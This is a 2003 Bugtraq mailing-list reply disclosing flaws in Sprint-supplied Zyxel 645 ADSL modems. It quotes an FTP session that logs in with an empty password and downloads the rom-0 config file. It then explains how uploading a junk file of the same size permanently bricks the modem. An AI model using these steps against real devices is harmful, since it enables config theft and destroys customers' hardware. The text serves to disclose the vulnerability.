[28592] in bugtraq
Re: SPRINT ADSL [Zyxel 645 Series Modem]
daemon@ATHENA.MIT.EDU (Raymond Dijkxhoorn)
Thu Jan 23 16:04:16 2003
Date: Thu, 23 Jan 2003 17:05:29 +0100 (CET)
From: Raymond Dijkxhoorn <raymond@prolocation.net>
To: "http-equiv@excite.com" <http-equiv@malware.com>
In-Reply-To: <200301231536.h0NFaIZ23356@web173.megawebservers.com>
Message-ID: <Pine.LNX.4.44.0301231700540.10234-100000@webber.prolocation.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi!
> shows 800 out of 2000 [of 100,000 or so] affected modems. Closer
> examination confirms:
> ftp> open malware.com
> Connected to malware.com.
> 220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000
> User (malware.com:(none)):
> 331 Enter PASS command
> Password:
> 230 Logged in
> ftp> get rom-0
> 200 Port command okay
> 150 Opening data connection for RETR rom-0
> 226 File sent OK
> ftp: 16384 bytes received in 2.03Seconds 8.07Kbytes/sec.
> ftp>
It's even worse: if you upload a config file, same size as the rom-0 file,
but filled with total crap, the modem reboots (it does that automatically
after uploading a new image) and after that the modem is broken. You ONLY
have the ability to upload a new image via a serial port then, and most
customers just have to bring back their unit. The modem is waiting after
upload of a broken image, with an x-modem session. And there it ends. Even
if you upload the previous image it won't work. Nice stuff :(
There are two files you can toy around with in this case, ras and rom-0.
ras is the image file, rom-0 is 'just' the config.
Bye,
Raymond.